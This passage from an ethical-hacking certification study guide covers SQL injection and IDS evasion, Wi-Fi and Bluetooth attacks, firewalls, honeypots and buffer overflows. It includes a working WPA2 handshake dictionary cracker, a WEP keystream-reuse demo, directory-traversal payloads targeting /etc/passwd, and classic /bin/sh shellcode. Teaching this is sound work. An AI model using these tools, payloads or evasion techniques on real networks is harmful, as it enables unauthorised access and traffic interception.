Targets may be set up with an Intrusion Detection System that compares attacks to input strings of known attacks to detect SQL injection attacks. To bypass this, you can obscure your attacks in multiple ways. Using various forms of encoding you can evade an IDS by not exactly matching what they are looking for. If an IDS is set to block attempts to inject 1=1 you can evade it by using 7=7 or a >1 comparison. Some IDSs can be evaded by encoding in HEX or using the CHAR function to represent characters. Dropping or adding whitespace [SPACE] can evade signatures as well; SQL queries do not always check for whitespace, while an IDS usually will require an exact match: UNION SELECT and UNION  SELECT (with extra whitespace) will be read differently. Adding inline comments with /* and */ to separate commands will also confuse most IDSs. String concatenation allows for commands to be entered in a shorthand form that the database can read. Concatenating these strings allows them to bypass rules in an IDS against the commands themselves being entered.

Defending Against SQL Injection
Web applications have the following vulnerabilities which require defending:

The database server can run OS commands; because of this the database service account needs to have minimal rights, and commands that allow shell prompts and network discovery should be disabled.

Error messages can be manipulated to reveal information in the database. To counteract this, error messages should be custom and suppressed whenever possible.

Data must be validated before it goes to the server. Stored procedures can be used to process user input and provide a layer of protection. Data should not be concatenated if it has not been validated. Removing known bad information may not always work as a validation process because of possible encoding techniques; instead, sanitize by removing everything but known good information.

Module 15 Wireless Networks Study Guide
Objectives:
. Wireless Networks
. Types of Wireless Networks
. WiFi Authentication Modes
. Types of Wireless Encryption
. Wireless Threats
. Wireless Hacking Methodology
. Wireless Hacking Tools
. Bluetooth Hacking
. Defending Against Bluetooth Hacking
. Defending Against Wireless Attacks
. Wi-Fi Security Tools
. Wireless Pen Testing Framework

Wireless Networks
Wireless networks broadcast data so that it can be received in a local area without wires. These networks are easier to install and scale to accommodate more users. These networks are less secure by virtue of this greater functionality.

Types of Wireless Networks
Wireless networks are built on standards. These standards can be set with options about authentication methods and encryption.

Wireless Standards
The 802.11x standards cover the development of the wireless spectrum for home and business use. For the CEH you need to understand the difference in megabit per second transmission and bandwidth used. 802.11a operates in the 5 GHz band with a maximum net data rate of 54 Mbit/s. 802.11b is built from the same standards and operates in the 2.4 GHz band with a maximum data rate of 11 Mbit/s. 802.11g uses the 2.4 GHz band at the data rate of 54 Mbit/s. 802.11n introduced Multiple Input, Multiple Output (MIMO), increasing the data rate to 600 Mbit/s in the 5 GHz band. All of these standards are marketed under the name Wi-Fi.

Bluetooth is a wireless standard for very short range transmission at a low bandwidth. Bluetooth is utilized for low power devices such as cell phone hands free microphones, requiring a close range under ten meters.

WiFi Authentication Modes

Open
In open authentication, the signal is not encrypted and any device can authenticate to the Access Point.

Shared Key
Clients use an encryption key known to the client and the Access Point to encrypt a challenge text sent from the access point to allow connection to the network.

Centralized
A central server handles an authentication mechanism to allow clients onto the network. The Access Point receives requests and asks for a response that includes an identity to pass on to the central server, such as a RADIUS server, which then handles the actual authentication.

Types of Wireless Encryption

WEP
Wired Equivalent Privacy is an older insecure encryption method. It uses small keys with flaws in implementation that make it trivial to break using tools like aircrack-ng.

WPA
Wi-Fi Protected Access corrects the flaws in WEP, creating a new wireless standard. Encryption is improved by using TKIP, Temporal Key Integrity Protocol, which creates a mechanism for changing the key used.

WPA2 uses AES 128 bit encryption and CCMP for stronger encryption than its predecessor. WPA2 Enterprise integrates with EAP standards for stronger authentication.

CCMP uses 128 bit keys and 48 bit initialization vectors, which is much better than the WEP standard used for replay detection.

EAP stands for Extensible Authentication Protocol, which allows multiple methods for authentication such as smart cards and tokens.

WEP Flaws

WEP was implemented without public or academic review. RC4 is a stream cipher, and a stream cipher's keystream must never be used for more than one message; WEP seeds RC4 with the shared key prefixed by a 24 bit initialization vector (IV) that is sent in the clear, so once an IV repeats, every frame sent under it shares one keystream. With only 2^24 IVs the space is exhausted in hours on a busy network, and repeats occur far sooner, leaving the traffic prone to replay and known-plaintext attacks. Certain "weak" IVs also leak bytes of the key itself (the FMS attack). Tools such as aircrack-ng allow WEP to be cracked with little technical knowledge.

Breaking WEP Encrypted Wireless Networks

aircrack-ng and a copy of BackTrack on a laptop with an injection capable wireless card are required for breaking WEP encrypted networks. The wireless card is set into monitor mode. Packets are captured with airodump-ng to collect frames carrying distinct IVs. aireplay-ng can be used to perform fake authentications and to replay captured ARP requests, generating traffic (and therefore fresh IVs) when the network is quiet. Once enough packets are collected they can be cracked using aircrack-ng, and the recovered key can then be used to join the network or to decrypt the captured traffic.

Breaking WPA Encrypted Wireless Networks

With WPA-PSK a Pre-Shared Key (the passphrase) is used to derive the Pairwise Master Key (PMK), from which the per-session TKIP or CCMP keys are derived. While the packets themselves are not crackable, this Pre-Shared Key can be brute forced. With an AP in range, you can capture the four-way handshake between a client and the AP and use offline tools, including precomputed tables built per SSID, to crack the WPA key offline. If there are live clients in range an attacker can force a client to disconnect with deauthentication frames; when it reconnects the handshake packets can be captured and a brute force attempt run against the Pairwise Master Key (PMK). The PMK is what is used to begin the encrypted session between the Access Point and the client, and because it is computed only from the passphrase and the SSID, each candidate passphrase can be tested against the captured handshake without any further contact with the network.

Wireless Threats

Access Control attacks are used against AP MAC filters or port access controls by spoofing MAC addresses or port addresses.

Integrity attacks inject data, for example replaying a captured authentication to gain access; they are also used to facilitate other attacks such as Denial of Service.

Confidentiality attacks intercept data that is assumed to be confidential.

Availability attacks prevent legitimate use of a wireless network or resource by preventing traffic from reaching it.

Authentication attacks aim to steal the identity of clients by cracking logins or sniffing credentials.
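The keystream-reuse flaw described under WEP Flaws, shown in working code. This is an added example, not code from the guide: it implements RC4, seeds it the way WEP does (the IV prepended to the shared key), and shows that once an attacker knows the plaintext of any one frame sent under a given IV, every other frame sent under that IV can be read without ever recovering the key. The key, IV and frame contents are constructed for the demonstration; a real WEP frame also carries a CRC-32 ICV, which is omitted because it plays no part in the problem.

```python
# Added example (not from the CEH guide): why a repeated WEP IV is fatal.
# WEP seeds RC4 with IV || key, so two frames sent under the same IV share one
# keystream. Key, IV and frame contents below are constructed for the demo.


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:                   # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings up to the length of the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: the 3-byte IV travels in the clear, followed by
    plaintext XOR RC4(IV || key). The real frame also carries a CRC-32 ICV,
    omitted here because it plays no part in the keystream-reuse problem."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    return iv + xor(plaintext, rc4_keystream(iv + wep_key, len(plaintext)))


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: keystream = ciphertext XOR plaintext."""
    return xor(frame[3:], known_plaintext)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Read any frame sent under the IV the keystream belongs to; no key needed."""
    return xor(frame[3:], keystream)


def demo() -> bytes:
    """Two frames under one IV: knowing one plaintext exposes the other."""
    wep_key = bytes.fromhex("0102030405")      # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                       # the IV space is only 2**24 values
    known = b"ARP-REQUEST:who-has 10.0.0.1"    # constructed: ARP traffic is predictable
    secret = b"pw=hunter2 admin=true"          # constructed: the frame worth reading
    frame1 = wep_encrypt(wep_key, iv, known)
    frame2 = wep_encrypt(wep_key, iv, secret)  # same IV reused -> same keystream
    assert frame1[:3] == frame2[:3]            # an attacker sees the IV repeat
    keystream = recover_keystream(frame1, known)
    return decrypt_with_keystream(frame2, keystream)


if __name__ == "__main__":
    print(demo())
```

Running `demo()` returns the second frame's plaintext even though the 40-bit key was never touched; aircrack-ng's statistical attacks go one step further and recover the key itself from the weak-IV frames, but the reuse shown here is already enough to read traffic.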
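The offline attack described under Breaking WPA, as an added example that is not from the guide. It builds a constructed WPA2-PSK four-way handshake the way a client would, then runs the same check aircrack-ng performs for each dictionary word: derive a candidate PMK with PBKDF2 from passphrase and SSID, expand it to the PTK with the 802.11i pseudo-random function, and compare the resulting EAPOL message-2 MIC with the captured one. SSID, MAC addresses, nonces, the RSN information element and the wordlist are all assumptions.

```python
# Added example (not from the CEH guide): offline dictionary attack against a
# captured WPA2-PSK four-way handshake. The capture is constructed below so the
# attack runs without a network; the derivation steps are those of IEEE 802.11i.
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81   # EAPOL header (4) + EAPOL-Key fields preceding the MIC (77)


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes      # authenticator address, from the capture
    sta_mac: bytes     # supplicant address
    anonce: bytes      # nonce from message 1
    snonce: bytes      # nonce from message 2
    eapol: bytes       # EAPOL-Key message 2 with its MIC field zeroed
    mic: bytes         # the 16-byte MIC the client actually sent


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 of 802.11i. Bytes 0-15 of the PTK are the KCK that keys the MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): HMAC-SHA1 over the frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate passphrase; the one whose KCK reproduces the MIC is the PSK."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = ptk_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return candidate
    return None


def make_handshake(passphrase: str, ssid: str, seed: bytes = b"demo") -> Handshake:
    """Constructed capture: message 2 of the handshake exactly as a client using
    `passphrase` would send it. MACs, nonces and the RSN IE are assumed values."""
    anonce = hashlib.sha256(seed + b"A").digest()   # deterministic stand-ins for random nonces
    snonce = hashlib.sha256(seed + b"S").digest()
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    # RSN IE: WPA2, CCMP group and pairwise cipher, PSK authentication
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = (b"\x02"                      # descriptor type: RSN key
            + b"\x01\x0a"                # key info: version 2, pairwise, MIC present
            + b"\x00\x10"                # key length (16 bytes for CCMP)
            + (1).to_bytes(8, "big")     # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + bytes(16)                  # MIC field, zero while computing the MIC
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X-2004, type Key
    assert eapol[MIC_OFFSET:MIC_OFFSET + 16] == bytes(16)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, eapol_mic(kck, eapol))


if __name__ == "__main__":
    capture = make_handshake("correct horse", "HomeNet")
    print(crack(capture, ["password", "letmein", "correct horse", "12345678"]))
```

Every candidate costs 4096 HMAC-SHA1 iterations, which is why the attack is dictionary-bound rather than instant, and why the SSID is part of the salt: precomputed tables only help against SSIDs they were built for. Nothing in `crack` talks to the network; the AP cannot rate-limit or log it.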

Rogue Access Points

Any access point set up to look like a legitimate member of the network, but used by a hacker to accomplish any of the attacks above.

Evil Twin Attack

Evil twin is the term for a rogue Wi-Fi access point that appears to be a legitimate hotspot offered on the premises, but has actually been set up by a hacker to eavesdrop on the wireless communications of Internet users. An evil twin attack is the wireless version of the phishing scam: an attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider. Clients that automatically join remembered SSIDs will connect to the twin without any user action if its signal is the stronger one.

Wardriving

Wardriving refers to driving around with a mobile Wi-Fi device looking for Wi-Fi signals. Cars driving around an area are common enough that they blend into the surroundings. Any method of travel can become a "war" vehicle. Warflying involves the use of a private, or in some cases remote controlled, aircraft with a Wi-Fi antenna mounted to it for the purpose of finding Wi-Fi signals. Warwalking can be done in a small area, like a college campus. Warchalking is a method of documenting Wi-Fi networks in public places; these marks often resemble graffiti.

Finding a Wi-Fi signal can be aided by using different antennas. Omnidirectional antennas are common; they pick up signal from all around them. A directional antenna such as a Yagi only works in one direction, but is designed to have a much greater range in that direction than an omnidirectional antenna would.

Wireless Hacking Methodology

Wi-Fi discovery can be passive, by monitoring for traffic, or active, by sending probes out and collecting the responses. Using passive methods allows you to stay hidden longer. Using active techniques increases the chances of your attacks being discovered; however, active techniques will usually generate the needed information faster.

GPS mapping is not always necessary for every job. Tools such as NetStumbler or WiGLE allow for automatic capture of GPS data in the log.

Wireless traffic analysis involves gathering information such as SSIDs and encryption methods to determine appropriate strategies for attacks. Some tools, such as airodump-ng from the aircrack-ng suite, provide this data automatically while monitoring.

Launch a wireless attack after determining the appropriate methods. Depending on the network, you may have to crack the Wi-Fi encryption before this, or you may be able to access information without this step.

Wireless Hacking Tools

Tool recommendation: aircrack-ng is the most used Wi-Fi tool of our practice. YouTube videos and Google searches will turn up an amazing amount of information on how to run it and what is needed to use aircrack-ng.

Bluetooth Hacking

Bluetooth hacking takes advantage of flaws in the Bluetooth stack in order to compromise Bluetooth enabled devices. All Bluetooth hacking requires close proximity to the device in question because of the range limits of the protocol.

Terms of Bluetooth Hacking

Bluesmacking is a DoS attack caused by oversized or random data packets (L2CAP echo requests) being sent to the device.

Bluesnarfing is the theft of information from a Bluetooth device.

Bluejacking refers to sending unsolicited messages over Bluetooth to other Bluetooth devices. This is done anonymously through the OBEX protocol.

Defending Against Bluetooth Hacking

If you keep Bluetooth disabled until you need it, you will minimize the window of opportunity for a hacker to compromise your device. When not pairing, keeping your device in non-discoverable mode is the best method of ensuring that the device does not broadcast information about itself. Lastly, encrypt data on the mobile device as a defense in depth measure should your device be compromised.

Defending Against Wireless Attacks

Always assume that your wireless signal will be available outside of your intended work area. Wireless signals handle network traffic just like a hub: the traffic is broadcast to anyone in range with the right equipment, and special antennas can pick up a signal from much further away than standard office equipment. Hiding your SSID broadcast and positioning your antennas can only do so much to limit your risk; these hiding techniques remove you from the low-hanging fruit category that hackers look for, nothing more. By ensuring that your wireless network is encrypted, and that your authentication is implemented correctly, you can keep your traffic confidential. Make sure that your wireless network is only used by the devices and users that need to use it. If a client can be wired, it is afforded a greater level of security. As with any other network, be sure that your equipment does not use default passwords. Physical access to network equipment can be used to bypass many network security controls. Periodic sweeps looking for rogue access points that may have been plugged into your wired network will address this problem.

WiFi Security Tools

Aircrack-ng Suite: An all-in-one set of tools easily found in BackTrack. Our practice uses this suite as a beginning-to-end tool. It allows for sniffing of traffic, packet capture, MAC address capture, and SSID and encryption method capture. After getting the information you need, aircrack-ng provides tools for breaking encryption keys and for using the recovered keys to decrypt traffic or to replay it.

Kismet

Kismet is a layer 2 wireless sniffer that works with most common wireless network cards. Kismet identifies networks by passively collecting packets, detecting standard named networks, detecting hidden networks, and inferring the presence of non-beaconing networks via data traffic.

NetStumbler

NetStumbler is a tool that sniffs Wi-Fi signals and informs users whether their wireless network is properly configured. This tool can be set to play an audio tone when it finds networks, which is great for wardriving.

Wireless Pen Testing Framework

The penetration test of a wireless network component begins with documenting what security is currently in place. After documenting the current state, the next step is to discover what vulnerabilities are available to exploit. Once a wireless device is discovered an auditor will determine what security is being used, such as WEP or WPA encryption. If the wireless network is using up-to-date encryption methods, and it is implemented in a secure manner, the auditor can then determine whether the target would require an infeasible amount of time to brute force an opening. Once this is determined and documented, the report can be created with the findings.

Module 16 Evading IDS, Firewalls and Honeypots

Objectives:
. Intrusion Detection Systems (IDS)
. Ways to Detect an Intrusion
. Types of Intrusion Detection Systems
. Firewalls
. Types of Firewalls
. Firewall Identification Techniques
. Honeypots
. Types of Honeypots
. Evading IDS
. Evading Firewalls
. Countermeasures
. Firewall and IDS Penetration Testing

Intrusion Detection Systems (IDS)

An intrusion detection system analyzes data from a network and compares that data against rules that have been configured. If the data does not match what the system expects it can raise an alarm. To analyze data an IDS has to be set to capture packets. To raise an alarm it has to be configured with rules that trigger this response.

Ways to Detect an Intrusion

Signature Recognition: Captured data is compared to signatures of possible attacks. This is also called misuse detection.

Anomaly Detection: This IDS relies on having a baseline of what normal network traffic looks like; once this is determined, anything outside of that norm is an anomaly.

Protocol Anomaly Detection: Instead of a baseline of network traffic, the expected behavior of each protocol is used as the base. Anything outside of this expected behavior is considered an anomaly.

Types of IDS

Network Based: A device placed on the network in promiscuous mode to listen for traffic and dynamically inspect network packets for suspicious and anomalous activity.

Host Based: A host-based IDS monitors all or parts of the dynamic behavior and state of a computer system. Think of a HIDS as an agent that monitors whether anything or anyone, internal or external, has circumvented the system's security policy.

Log File Monitoring: These systems collect log data and comb through it to reveal events after they occur.

Intrusion Detection Tool: Snort

Snort is an open source network tool capable of firewall-type packet filtering, protocol analysis, and rules based logging. Snort is used for a variety of network tasks. The CEH exam expects students to be familiar with Snort logs and functions, but not necessarily exact commands.

File Integrity Checking

Compares files against a record of what each file is supposed to look like, to monitor whether files have been changed by intruders.

Any of these IDS types may be wrapped into another piece of equipment such as a firewall or network gateway.

Indications of Intrusions

1. New files that are unfamiliar
2. Repeated probes of machines and services
3. Connections from unusual locations
4. Gaps in system log file accounting
5. System crashes or reboots

Unfortunately, these indications can also be signs of legitimate user activity and accidents.

Firewalls

A firewall is a packet filter between networks. Commonly they are used to keep Internet traffic on one side of the wall and internal traffic on the other. Firewalls may filter traffic based on port, source or destination address, or type of traffic.

Firewall Architecture

Bastion Host

A bastion host is a special purpose computer on a network, specifically designed and configured to withstand attacks. It is configured with a public interface connected to the Internet and a private one connected to the internal network. A bastion host is a computer that is fully exposed to attack: the system sits on the public side of the demilitarized zone (DMZ), unprotected by a firewall or filtering router. Frequently the roles of these systems are critical to the network security design, so they run only the services they must and are hardened accordingly.

There are two common network configurations that include bastion hosts and their placement. The first requires two firewalls, with bastion hosts sitting between the first "outside world" firewall and an inside firewall, in a demilitarized zone (DMZ). Often smaller networks do not have multiple firewalls, so if only one firewall exists in a network, bastion hosts are commonly placed outside the firewall.

Screened Subnet

A screened subnet firewall can be used to separate components of the firewall onto separate systems, for speed and organizational purposes. This requires at least three interfaces: public, private, and the mixed (DMZ) segment. As each component system of the screened subnet firewall needs to implement only a specific task, each system is less complex to configure. A screened subnet firewall is often used to establish a demilitarized zone (DMZ). The DMZ houses resources that are available to the public, such as web servers. This allows the private systems to be kept behind a separate network interface from the publicly reachable ones.

Multi-homed Firewall

Multi-homed equipment allows for more zone creation, to keep sections of the internal network from connecting to each other or to allow the DMZ to be divided up more specifically.

Types of Firewalls

Firewalls are categorized by the level of the OSI model at which they operate.

Packet Filtering Firewall

These firewalls work at the network level. Typically they are paired with a network router to compare packets against criteria and then discard or route the packet in question depending on which criteria it matches. They may allow further rule customization such as addresses, ports, or protocols involved. Because each packet is judged on its own, a packet filter cannot tell whether a packet belongs to an established connection.

Circuit Level Gateway Firewall

This type of firewall operates at the Session layer of the OSI model. These gateways monitor traffic for TCP handshake information and determine whether or not the session is allowed. They do not filter individual packets.

Application Level Firewall

These firewalls operate at the Application layer of the OSI model. Only allowed applications are able to pass traffic through this system. The high level filtering allows for application specific filtering.

Stateful Multilayer Inspection Firewall

This is a combination of firewall types that filters at all of the above firewall types' levels, tracking the state of each connection so that packets are judged in context rather than one at a time.

Firewall Identification Techniques

Firewalls can be identified by how they act. All firewalls involve a set of rules, rules create patterns, and patterns can be exploited by hackers. Some firewalls have a signature of what ports they listen on; they are revealed by port scanning.

Firewalking is a method of using the Time to Live (TTL) field of TCP or UDP packets to determine whether a target allows traffic through to a hop on the other side: packets are sent with a TTL one greater than the distance to the firewall, so the hop behind the firewall answers with an ICMP "TTL exceeded in transit" message for every packet the firewall forwarded. Which packets are forwarded and produce that message informs a hacker of what traffic is being passed into the network.

Banner grabbing using FTP, Telnet, SMTP or HTTP ports is another method of identifying services, if the banner has been left as a default.

Honeypots

Honeypots are systems that are configured to look like production systems in order to attract possible intruders. Any activity on this otherwise unused system would be a sign of a hacker taking a look around. However, as a hacker, when you encounter a system that appears to be open to everything you want to access, you are probably in a honeypot and should therefore leave it alone.

Types of Honeypots

Honeypots can be classified based on their deployment and based on their level of involvement.

Based on deployment, honeypots may be classified as:

Production honeypots are easy to use, capture only limited information, and are used primarily by companies or corporations. Production honeypots are placed inside the production network with other production servers by an organization to improve its overall state of security.

Research honeypots are run by a volunteer, non-profit research organization or an educational institution to gather information about the motives and tactics of the cracker community targeting different networks. Research honeypots are complex to deploy and maintain, capture extensive information, and are used primarily by research, military, or government organizations.

Based on design criteria, honeypots can be classified into three categories:
1. pure honeypots
2. high interaction honeypots
3. low interaction honeypots

A pure honeypot is a full production system. The activities of the attacker are monitored using a tap installed on the honeypot's link to the network.

High interaction honeypots imitate the activities of a real system that hosts a wide variety of services and, therefore, an attacker may be allowed a lot of services to waste his or her time on. If virtual machines are not available, each honeypot needs to be maintained on a physical computer, which can be very expensive.

Low interaction honeypots simulate only the services that attackers normally request. Offering only a few services means low overhead and simple configuration. Example: Honeyd.

Honeytokens are honeypots that are not computer systems. Their value lies not in their use, but in their abuse. Honeytokens can exist in almost any form, from a fake account to a database entry that would only be selected by malicious queries, making the concept ideally suited to ensuring data integrity: any use of them is inherently suspicious if not necessarily malicious. In general, they do not prevent any tampering with the data, but instead give the administrator a further measure of confidence in the data's integrity.




Evading Intrusion Detection Systems

IDSs are susceptible to multiple evasion techniques and can even be used to attack a target. By creating a Denial of Service, a hacker can consume the resources of the IDS to the point that it is unable to log an actual attack. DoS may also be used to bring the IDS offline, leaving the network unprotected during the intended attack.

Because an IDS uses specific rules to identify attacks, any method used to encode or hide the attack may succeed, such as encoding in Unicode or using encrypted channels. If the rules require an exact match of data, making the data look different will not set off an alarm.

Fragmentation attacks take advantage of a difference in reassembly configuration where the victim has a longer timeout for fragments than the IDS does. The IDS is unable to assemble the fragmented attack in the window of time allowed by its rule and so passes the packets on, but the victim waits longer to reassemble and does so.

Invalid RST packets may be used to trick the IDS into believing a session has ended, while keeping the communication alive. TCP uses checksums to ensure communication is reliable; if the checksum is wrong the receiver throws the packet out. When an IDS that does not verify checksums sees the RST packet with an invalid checksum it does not discard it and assumes the session is over. The victim does see the checksum as invalid and discards the RST packet, keeping the communication going.

Application layer attacks depend upon an IDS being unable to inspect inside a compressed file format such as image or video data.

Any flood of data can be used to bury an attack within a wall of log data that all too often goes unread or unanalyzed.

Evading Firewalls

By spoofing an IP address that is trusted by the target firewall, a hacker can gain access just like the actual spoofed machine.

By asking for information in a way the firewall does not expect, you can gain access to data the firewall would normally block. For example, if a firewall is configured to block all HTTP access to www.facebook.com by name, but you resolve www.facebook.com to 69.171.228.39 and put that address in your web browser, the firewall does not see that as a request for the same information. This only works against filters that match on hostname or URL rather than on destination address.

Creating a tunnel through accepted protocols can also bypass most firewall restrictions. ICMP, HTTP, and other standard communications can be used to carry a tunnel that the firewall then sees as accepted communication.


Countermeasures

IDSs and firewalls live and die by their rules and signatures. Always keep the signatures and software up to date to avoid falling victim to an already patched exploit or to an attack for which a signature was available. Ensure that your settings allow the IDS to reassemble fragmented data exactly as the end client will see it. Rules need to be set to account for the ability of information to be requested and sent in multiple encoding methods, so normalize traffic (decode URL, Unicode and other encodings) before matching signatures against it.
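A miniature signature IDS, as an added example (not the guide's code and not Snort itself), that ties the encoding evasion described under Evading Intrusion Detection Systems to the normalization countermeasure above. It parses a few constructed rules written in Snort syntax, matches their `content` options against constructed HTTP payloads, and shows that percent-encoded variants of a directory traversal slip past a literal match but are caught once the payload is decoded before matching. Rule sids, packets and payloads are all constructed.

```python
# Added example (not from the CEH guide, and not Snort): a miniature signature
# IDS that reads Snort-syntax rules and shows how encoding evades a literal
# content match, and how normalizing the payload first closes the gap.
import re
from urllib.parse import unquote_to_bytes

# Constructed rules (sids in the 1000000+ range reserved for local rules).
RULES = [
    'alert tcp any any -> any 80 (msg:"WEB-ATTACK directory traversal"; '
    'content:"../"; sid:1000001;)',
    'alert tcp any any -> any 80 (msg:"WEB-ATTACK /etc/passwd request"; '
    'content:"/etc/passwd"; nocase; sid:1000002;)',
]

RULE_RE = re.compile(
    r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s*->\s*(\S+)\s+(\S+)\s*\((.*)\)\s*$")


def parse_rule(text: str) -> dict:
    """Split one Snort rule into its header fields and its option list."""
    m = RULE_RE.match(text)
    if not m:
        raise ValueError("unparseable rule: " + text)
    action, proto, src, sport, dst, dport, opts = m.groups()
    rule = {"action": action, "proto": proto, "src": src, "sport": sport,
            "dst": dst, "dport": dport, "options": {}}
    for opt in (o.strip() for o in opts.split(";")):
        if not opt:
            continue
        key, _, val = opt.partition(":")
        rule["options"][key.strip()] = val.strip().strip('"') if val else True
    return rule


def _port_matches(spec: str, port: int) -> bool:
    return spec == "any" or int(spec) == port


def rule_matches(rule: dict, pkt: dict, normalize: bool = False) -> bool:
    """Header check, then the content option. With normalize=True the payload is
    percent-decoded before matching, as Snort's HTTP preprocessor does."""
    if rule["proto"] != pkt["proto"] or not _port_matches(rule["dport"], pkt["dport"]):
        return False
    opts = rule["options"]
    payload = pkt["payload"]
    needle = opts["content"].encode()
    if normalize:
        payload = unquote_to_bytes(payload)
    if opts.get("nocase"):
        payload, needle = payload.lower(), needle.lower()
    return needle in payload


def run_ids(rules, packets, normalize: bool = False):
    """Return, per packet, the sorted list of rule sids that fired."""
    parsed = [parse_rule(r) for r in rules]
    return [sorted(int(r["options"]["sid"]) for r in parsed if rule_matches(r, p, normalize))
            for p in packets]


# Constructed packets: a plain attack, two encoded variants, and benign traffic.
PACKETS = [
    {"proto": "tcp", "dport": 80, "payload": b"GET /../../etc/passwd HTTP/1.0\r\n"},
    {"proto": "tcp", "dport": 80, "payload": b"GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.0\r\n"},
    {"proto": "tcp", "dport": 80, "payload": b"GET /..%2F..%2Fetc/PASSWD HTTP/1.0\r\n"},
    {"proto": "tcp", "dport": 80, "payload": b"GET /index.html HTTP/1.0\r\n"},
]


if __name__ == "__main__":
    print("literal match:   ", run_ids(RULES, PACKETS))
    print("normalized match:", run_ids(RULES, PACKETS, normalize=True))
```

With a literal match only the first packet trips both rules; the `%2e%2e` and `%2F` variants reach the web server, which decodes them, untouched. Decoding before matching makes all three attack packets fire both sids while the benign request still fires none, which is the "see the data as the end client will see it" rule from the countermeasures applied to encoding rather than fragmentation.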


Firewall/IDS Penetration Testing

Testing of firewalls and Intrusion Detection Systems is a matter of finding out whether the rules account for the methods that may be used to bypass their protection. If the rules keep out the attack, then the system is considered secure.

Module 17 Buffer Overflows

Study Guide Objectives:
. Buffer Overflows
. Stack-Based Buffer Overflow
. Heap-Based Buffer Overflow
. Stack Operation
. Buffer Overflow Steps
. Attacking a Real Program
. Smashing the Stack
. Identifying Buffer Overflows
. BoF Detection Tools
. Defense against Buffer Overflows
. BoF Countermeasure Tools
. BoF Pen Testing

Buffer Overflows

Programs utilize memory to work. They store information in allocated memory. These allocations are usually created to fit a certain number of bytes of data. When the information that is placed in memory is more bytes than the space that was allocated, you have a buffer overflow or buffer overrun. This overwrites whatever comes next in memory. If a critical piece of data is overwritten, the program crashes. This can be as simple as a program expecting to receive a 10 digit phone number but a call like strcpy placing 11 bytes (or many more, since strcpy never checks the destination size) in the memory space, crashing the program.

Stack Based Buffer Overflow

The stack or call stack is a section of memory used to keep track of subroutines in a computer program: each call pushes a frame holding the function's local buffers, the saved frame pointer and the return address. A stack based buffer overflow attacks this structure to overwrite data, including that return address, or to introduce commands to make the program function in ways the programmer did not intend.

Heap Based Buffer Overflow

The heap is an area of memory dynamically allocated while the program runs. A heap based overflow corrupts this data to alter the structure of the heap and run malicious code.

Stack Operation

Shellcode

Exploits for buffer overflows utilize shellcode. These bits of assembly level programming are written to be executed by the overflowed program and give a hacker a measure of control. For the CEH test be able to identify shellcode such as this (the minimal Linux x86 execve("/bin/sh") shellcode from Aleph One's tutorial):

/* This is the minimal shellcode from the tutorial */
static char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

The trailing bytes 2f 62 69 6e 2f 73 68 are the ASCII string "/bin/sh", and the sequence contains no zero byte, so it survives being copied by string functions such as strcpy.

No Operations

Most CPUs have a No Operation instruction, or NOP, which does nothing except advance to the next instruction. A long string of these instructions can be placed in front of the shellcode in an exploit, which is called a NOP sled: if the overwritten return address lands anywhere in the sled, execution "slides" forward until it reaches the shellcode, so the attacker does not need to know the buffer's exact address. The NOP sled is often encoded to look like something else, but recognizing 0x90 as the standard x86 NOP is recommended.

Knowledge Required to Create a Buffer Overflow Exploit

